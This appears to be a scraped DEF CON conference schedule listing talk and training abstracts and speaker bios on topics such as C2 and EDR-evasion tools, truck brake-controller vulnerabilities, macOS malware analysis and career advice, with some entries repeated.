Speakers:Ezz Tahoun,Kevin ShiEzz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.
SpeakerBio: Kevin ShiKevin is a data scientist specializing in cybersecurity and machine learning, currently working at the Canadian Institute for Cybersecurity at the University of New Brunswick. He holds a Master’s degree in Data Science from the University of Windsor, where he focused on applying advanced analytics and machine learning techniques to complex cybersecurity problems. His expertise includes developing and optimizing AI-driven methods for threat detection, anomaly identification, and security event analysis. His research contributions emphasize practical implementations of data science in cybersecurity operations, bridging theoretical approaches with real-world applications.
- ics Calendar file
Watch teams deploy AI-powered agents in a soundproof booth to place live vishing calls and hit preset objectives, pushing the limits of automation, hacking, and human psychology.
- ics Calendar file
The Beaconator C2 framework provides multiple highly evasive payloads, created to provide red teams with code execution, versatility, and ease of use. It is intended to be a Swiss Army knife for evasive C2, with a unified listener and basic tools to manage an engagement. The goal is to empower red/purple teams to emulate emerging adversary tactics that are evasive, prove them out, and then open tickets with various AV/EDR vendors to improve detectability for these blind spots that are now exploited in the wild.
Speakers:Mike "CroodSolutions" Manrod,Ezra "Shammahwoods" WoodsMike serves as the CISO for Grand Canyon Education and adjunct faculty for Grand Canyon University, teaching malware analysis. Mike also co-founded the Threat Intelligence Support Unit (TISU), a community for threat and adversary research. He is also a co-author/contributor for the joint book project, Understanding New Security Threats published by Routledge in 2019, along with numerous articles. When not working, he spends time playing video games and doing random projects with his kids.
SpeakerBio: Ezra "Shammahwoods" WoodsEzra is an avid security researcher currently working as an information security engineer with Grand Canyon Education.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth BiddlecomeSam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at AmazonKaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional ServicesIrvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and InstructorElizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth BiddlecomeSam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at AmazonKaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional ServicesIrvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and InstructorElizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth BiddlecomeSam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at AmazonKaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional ServicesIrvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and InstructorElizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth BiddlecomeSam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at AmazonKaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional ServicesIrvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and InstructorElizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.
- ics Calendar file
Payments infrastructure is often built with strong security and reliability guarantees but those guarantees can be undermined by failures in the systems it depends on. In this talk, we examine postmortems from real-world outages where the core payments systems remained robust, yet external or supporting infrastructure such as DNS, authentication services, cloud dependencies, or third-party integrations introduced vulnerabilities during periods of instability
SpeakerBio: Tapan KhilnaniTapan is an engineering manager with deep experience in building and scaling payment systems. With a background that spans global enterprises and early-stage startups, he brings a well-rounded perspective to technical and organizational challenges. He holds an engineering master’s degree, which grounds his practical work in strong technical foundations
- ics Calendar file
When confronted with malicious macOS binaries, analysts typically reach for a disassembler and immerse themselves in the complexities of low-level assembly. But what if this tedious process could be skipped entirely?
While many malware samples are distributed as native macOS binaries (easily run with a simple double-click), they frequently encapsulate scripts hidden within executable wrappers. Leveraging frameworks such as PyInstaller, Appify, Tauri, and Platypus, malware authors embed their scripts with binaries, complicating traditional analysis. Although these frameworks share the goal of producing natively executable binaries, each employs a distinct method to embed scripts, thus necessitating tailored extraction tools and approaches.
Using real-world macOS malware (such as Shlayer, CreativeUpdate, GravityRAT, and many others), we'll first demonstrate how to identify these faux binaries and then how to efficiently extract or reconstruct their embedded scripts, bypassing the disassembler entirely!
References:
Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
- ics Calendar file
Blackdagger is a next-gen cybersecurity workflow automation framework built to streamline and accelerate complex operations across DevSecOps, MLOps, MLSecOps, and Continuous Automated Red Teaming (CART). It uses a declarative YAML-based Directed Acyclic Graph (DAG) system to define, visualize, and execute automated pipelines — no heavy scripting required. With a built-in web UI, a containerized red teaming toolkit called Blackcart, and integration with GitHub Actions for OPSEC-friendly task execution, Blackdagger empowers teams to deploy, manage, and scale cyber workflows in real-time. Attendees will see live demos of red team pipelines, stealthy GitHub-based automation, and browser-based workflow execution via the Blackdagger Web Kit. Whether you're defending or attacking, Blackdagger turns security automation into an intuitive, visual experience — backed by real-world NATO and defense applications.
Speakers:Mahmut "ErdemOzgen" Erdem Ozgen,Ata SerenMahmut is a computer engineer from Ankara, Turkey, specializing in software engineering, cybersecurity, ML systems, and DevSecOps. A Bahcesehir University graduate (2015-2020), he has played key roles at HAVELSAN, developing secure DevSecOps pipelines and cybersecurity architectures for Turkish Armed Forces, contributing to national security systems advancement. He has extensive experience with machine learning and LLMs, applying theoretical concepts to practical solutions. As a student research assistant at Istanbul Big Data Education and Research Center, he implemented learning-based algorithms for drone routing and conducted text processing and sentiment analysis. His technical expertise encompasses Python, Go, C/C++, Java, JavaScript, Docker, Kubernetes, Terraform, and blockchain technologies. Fluent in English and Turkish, he has received notable recognition, including first place in the Presidency of Defence Industries Cyber Capstone Projects and a full scholarship from Bahcesehir University. Additionally, he has served on the NATO Locked Shields exercise green team, implementing ML and LLM-based systems, and currently serves as a red team capability leader in the NATO CWIX exercise.
SpeakerBio: Ata SerenAta is a specialized cyber security engineer with expertise in application security, DevSecOps, and penetration testing. Currently pursuing a Master’s degree in Cyber Security at Middle East Technical University, his thesis focuses on static application security testing, tool mechanisms, and innovative approaches in the field. With professional experience at HAVELSAN, he has contributed to significant NATO projects and open-source cybersecurity tools including DevSecOpsBuilder, Blackcart, and Blackdagger. His involvement in the NATO Locked Shields exercise in 2024 and 2025 demonstrates his practical expertise in cyber defense operations at an international level. A recognized voice in the cybersecurity community, he has presented the Blackdagger tool at Black Hat USA, Europe, and Asia conferences alongside his colleague. Most recently, he spoke at CyCon 2025, introducing a new cybersecurity framework to industry professionals. His technical proficiency spans multiple programming languages including Python, Golang, and C/C++, complemented by extensive knowledge of cybersecurity fundamentals, cloud security, and AI/ML approaches to security challenges. He is currently expanding his red teaming capabilities while studying for the OSCP certification from OffSec.
- ics Calendar file
Tanker trailers? Turns out those aren't just big, dumb hunks of metal. They have a powerline network, PLC4TRUCKS, which is unintentionally accessible wirelessly (CVEs 2020-14514 and 2022-26131). We found new trailer brake controllers using diagnostic protocol KWP2000, secured with access control by seed-key (a challenge-response protocol). We'll show how to use Wireshark to analyze the diag. traffic. We'll discuss why randomness is critical for any challenge-response protocol.
We'll cover two ways to bypass this access control: using a SMT solver to crack the routine from a few request-response pairs (automated with AHK), and a classic reset attack that makes seeds entirely predictable. This second way allows for a blind, wireless attack, a finding now recognized as CVE-2024-12054. We'll detail how we ran timing search 'campaigns' with a custom sigrok decoder to PoC it.
The trailer brake controller is also at risk from trailer-installed telematics devices too. We'll show how to use Scapy Automotive's UDS scanner on a faked CAN bus for PLC4TRUCKS (plus modify that for a known seed-key routine) so we can get a picture of that attack surface.
This and the previous CVEs are a result of the heavy vehicle testing we do. We'll share some details of how we do onsite truck tests and how we do bench tests.
SpeakerBio: Ben GardinerBen is a Senior Cybersecurity Research Engineer at the National Motor Freight Traffic Association, Inc. (NMFTA)™ specializing in hardware and low-level software security. He has held security assurance and reversing roles at a global corporation, as well as worked in embedded software and systems engineering roles at several organizations.
Ben has conducted workshops and presentations at numerous cybersecurity events globally, including the CyberTruck Challenge, GENIVI security sessions, Hack in Paris, HackFest, escar USA and DEF CON.
Ben holds a M.Sc. Eng. in Applied Math & Stats from Queen’s University. In addition to speaking on the main stage at DEF CON, Ben is a volunteer at the DEF CON Hardware Hacking Village (DC HHV) and Car Hacking Village (CHV). He is GIAC GPEN and GICSP certified, chair of the SAE TEVEES18A1 Cybersecurity Assurance Testing TF (published J3322), a contributor to several American Trucking Associations (ATA) Technology & Maintenance Council (TMC) task forces, ISO WG11 committees, and a voting member of the SAE Vehicle Electronic Systems Security Committee.
- ics Calendar file
Tactic activity that can run for the length of the village each day. CTF activity where attendees can use Bloodhound Enterprise in a simulated environment to gain flags. CTF windows is 20 mins for each registered user
Speakers:Hugo van den Toorn,Joey DreijerHugo is former Chief Information Security Officer and has now transitioned back to help other organizations understand adversary tradecraft. With over twelve years of experience in the Information Security industry, he has a solid technical and executive background as hands-on security leader.
Hugo has experience with and a keen interest in Social engineering, phishing and physical penetration testing. Nowadays, Hugo takes pride and joy in helping individual team members and the business grow. With a strong technical foundation, Hugo combines his passion for security, teaching and hacking with a drive for continuous improvement and optimization of people, processes and technology.
SpeakerBio: Joey Dreijer
- ics Calendar file
Attributing cyber threats to a specific nation-state remains one of the most complex challenges in cybersecurity. Cyber attribution relies on analyzing digital artifacts, infrastructure patterns, and adversary tactics, none of which provide definitive proof on their own. Threat actors continuously evolve, adopting new methodologies and obfuscation techniques that make attribution increasingly difficult. Over the past decade, North Korea’s cyber operations have transformed from rudimentary attacks into highly sophisticated campaigns that rival the capabilities of established cyber powers. Initially, DPRK’s cyber program consisted of loosely organized groups with limited technical capacity, but today, these actors operate under a structured, state-controlled framework with clear strategic objectives. This research presents an in-depth analysis of how DPRK threat actors have adapted, restructured, and collaborated, shedding light on the complexities of nation-state attribution.
SpeakerBio: Seongsu Park, APT Research team, Staff Threat Researcher at ZscalerSeongsu Park(@unpacker) is a passionate researcher on malware research, threat intelligence, and incident response with over a decade of experience in cybersecurity. He has extensive experience in malware researching, evolving attack vectors researching, and threat intelligence with a heavy focus on response to high-skilled North Korea threat actors.
Now he is working in the Zscaler APT Research team as a Staff Threat Researcher and focuses on analyzing and tracking security threats in the APAC region.
- ics Calendar file
BOAZ (Bypass, Obfuscate, Adapt, Zero-Trust) evasion was inspired by the concept of multi-layered approach which is the evasive version of defence-in-depth first proposed in a presentation at BH USA14. BOAZ was developed to provide greater control over combinations of evasion methods, enabling more granular evaluations against antivirus and EDR. It is designed to bypass before, during, and post execution detections that span signature, heuristic, and behavioural detection mechanisms. BOAZ supports both x86/x64 binary (PE) or raw payload as input and output EXE or DLL. It has been tested on separated Windows 11 Enterprise, Windows 10, and Windows Server 2022 VMs with 14 desktop AVs and 7 EDRs installed including Windows Defender, Norton, BitDefender, Sophos, and ESET. The design of BOAZ evasion is modular, so users can add their own toolset or techniques to the framework. BOAZ is written in C++ and C and uses Python3 as the main linker to integrate all modules. There have been significant improvements implemented since its inception. The new version of the BOAZ evasion tool, set for release at DEF CON 33, will feature three novel threadless process injection primitives, along with newly implemented loaders and behavioural evasion techniques.
SpeakerBio: Thomas "XM20" Xuan MengThomas is a cybersecurity researcher, reverse engineer, and developer with a diverse background in policing, academia, and civil service. He holds a PhD in Computational Engineering, an MPhil in Criminological Research, and a BSc in Mathematics, and was awarded a university medal in Cybersecurity from Edinburgh Napier University.
- ics Calendar file
Drinor Selmanaj is a cybersecurity pioneer, Forbes Technology Council member, and published author. As Founder of Sentry, he leads an elite team securing unicorn-stage companies and Big Four clients across critical sectors. He also founded the Cyber Academy, where his hands-on training programs and AI-driven edtech solutions have launched thousands of careers and are redefining how cybersecurity talent is developed worldwide.
SpeakerBio: Drinor SelmanajDrinor Selmanaj is a cybersecurity pioneer, Forbes Technology Council member, and published author. As Founder of Sentry, he leads an elite team securing unicorn-stage companies and Big Four clients across critical sectors. He also founded the Cyber Academy, where his hands-on training programs and AI-driven edtech solutions have launched thousands of careers and are redefining how cybersecurity talent is developed worldwide.
- ics Calendar file
- ics Calendar file
- ics Calendar file
Corey Ball is the founder and CEO of hAPI Labs, where he provides penetration testing services. He is the author of Hacking APIs, founder of APIsec University, and has over fifteen years of experience working in IT and cybersecurity. Corey holds the OSCP, CCISO, CISSP, and several other industry certifications.
- ics Calendar file
As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
SpeakerBio: Chris DeCarmenAs a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
- ics Calendar file
As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
SpeakerBio: Chris DeCarmenAs a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
- ics Calendar file
Eugene Lim is a security researcher and white hat hacker. From Amazon to Zoom, he has helped secure applications from a range of vulnerabilities. His work has been featured at top conferences such as Black Hat, DEF CON, and industry publications like WIRED and The Register.
- ics Calendar file
- ics Calendar file
Laura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness.
Accepted Payment Methods: Cash, Venmo, and Paypal
SpeakerBio: Laura S. Scherling, EdDLaura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness. Accepted Payment Methods: Cash, Venmo, and Paypal
- ics Calendar file
- ics Calendar file
- ics Calendar file
Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.
- ics Calendar file
Micah is a member of the Lockdown Systems collective. He's a coder, a security researcher, and an independent journalist. He develops open source privacy and security tools, and he's done a lot of work related to journalism and whistleblowing. He’s the former director of infosec for The Intercept. He wrote a book that teaches people how to analyze hacked and leaked datasets, Hacks, Leaks, and Revelations. He really doesn’t like the technofascist future we’ve all been forced into.
- ics Calendar file
Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
- ics Calendar file
- ics Calendar file
While paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.
In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.
SpeakerBio: Deviant Ollam, Director of Education at Red Team AllianceWhile paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.
In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.
- ics Calendar file
Audrey is currently a security researcher at SquareX. She leads the Year of Browser Bugs (YOBB) project which has disclosed multiple major architectural browser vulnerabilities to date. Key discoveries from YOBB include Polymorphic Extensions, Browser-native Ransomware and Browser Syncjacking, all of which have been covered by major publications such as Forbes, Bleeping
Computer and Mashable. She has also presented her research as a speaker at BSides SF and Stanford University, and is part of the HQ Committee of Women in Security and Privacy (WISP). Prior to SquareX, Audrey was a cybersecurity investor at Sequoia Capital, investing in software and cybersecurity startups.
SpeakerBio: Audrey AdelineAudrey is currently a security researcher at SquareX. She leads the Year of Browser Bugs (YOBB) project which has disclosed multiple major architectural browser vulnerabilities to date. Key discoveries from YOBB include Polymorphic Extensions, Browser-native Ransomware and Browser Syncjacking, all of which have been covered by major publications such as Forbes, Bleeping Computer and Mashable. She has also presented her research as a speaker at BSides SF and Stanford University, and is part of the HQ Committee of Women in Security and Privacy (WISP). Prior to SquareX, Audrey was a cybersecurity investor at Sequoia Capital, investing in software and cybersecurity startups.
- ics Calendar file
Garrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.
With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.
As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.
For more about Garrett visit https://GarrettGee.com
SpeakerBio: Garrett GeeGarrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.
With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.
As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.
- ics Calendar file
Back in 2020 the Brazilian Central Bank launched PIX, a real time wire transfer and payment protocol that has been adopted by the Brazilian population, and nowadays PIX represents the most used payment method in the country. However, local cybercriminals quickly adapted and leveraged PIX for malicious activity. Since then, criminal activity in Brazil has ramped, from kidnapping, stealing of mobile phones, to money laundering "on steroids" and targeted banking trojans. Instant wire transfers made fraudulent transactions run faster than the speed of light, and were almost impossible to stop and to recover the stolen funds. A criminals' paradise. In this presentation we will discuss the fraud schemes that were fueled by PIX and the ones that emerged since then, haunting the local population.
SpeakerBio: Anchises Moraes, Cyber Threat intel Lead at APURA Cyber Intelligence SALord Anchises Moraes Brazilborn of the house Hacker, First of His Name, Born in Computer Science, Cybersecurity Work-aholic, Lead of Threat Intel Realm, founder of Security BSides São Paulo, Supreme Chancellor of Garoa Hacker Clube, He for She volunteer at WOMCY (LATAM Women in Cybersecurity), Mente Binária NGO Counselor, Security Specialist and Protector of the Cyber Space realm.
- ics Calendar file
It was the summer of 2016, and like everyone else, I was out playing Pokémon Go. Except my rural location barely spawned anything interesting. Naturally, I dove into the game's code, reverse engineered its protocol, and built a custom Pokémon scanner.
But the story doesn't end there. One day, a switch was flipped, enabling a fancy new anti-cheating feature that locked out any custom implementations.
In this talk, I'll begin by exploring how mobile games like Pokémon Go handle communication through specialized protocols—and how I replicated that behavior to build a scanner. Then, I'll walk you through a 4-day hacking marathon where I teamed up with a group of like-minded enthusiasts to overcome the anti-cheating mechanism that nearly broke our scanners.
We'll examine how mobile games attempt to thwart such applications, unraveling the anti-cheating mechanism that was deployed by Pokemon Go. We'll explore how we managed, through obfuscated cryptographic functions, unexpected use of smartphone peripherals and hidden protobuf definitions, to break the anti-cheating system and release a publicly available API for the game's protocol.
Almost a decade later, the full story is ready to be told. Join me for an inside look at the anti-cheating mechanisms of online mobile games—and how to hack them.
References:
SpeakerBio: Tal SkvererIn the past decade, Tal turned his hacking hobby into a career. His experience covers reverse engineering, malware analysis, embedded security, web hacking, cryptography, and computational complexity. He also teaches a biannual workshop on assembly, reverse engineering x86/x64, and blackbox research.
Tal hold an M.Sc. in Theoretical Computer Science from the Weizmann Institute.
Currently, Tal is the Head of Research at Astrix Security, where, among other things, he discovers vulnerabilities in how cloud providers implement connectivity between (and by) non-human identities.
Some of things Tal did in a past: Hacked vehicle infotainment systems at his previous job Was a part of the “Unknown6” research group that broke PokemonGo’s anti-cheating system in 2016. Turned a OnePlus 5T whose screen he accidentally broke into an ad blocker for my home network, as well as a meta search engine focused on ultimate privacy. Presented at several conferences including DEFCON, RSAC, BSides, and OWASP chapters. Conducted an open-heart surgery on a (1 month off warranty) Nintendo Switch to replace a defective part, which highlights the importance of the “Right to Repair” movement.
- ics Calendar file
Trying to break into cybersecurity? Forget the hype. This panel cuts through the noise to show you what actually works: what roles are out there, what skills and certs are worth your time, how to build a real resume, and how to find your people in the community. We’ll talk job hunting, self-study, mentorship, influencers (the good and the grifty), and how to avoid wasting time and money. Ends with an open Q&A. No gatekeeping. No fluff.
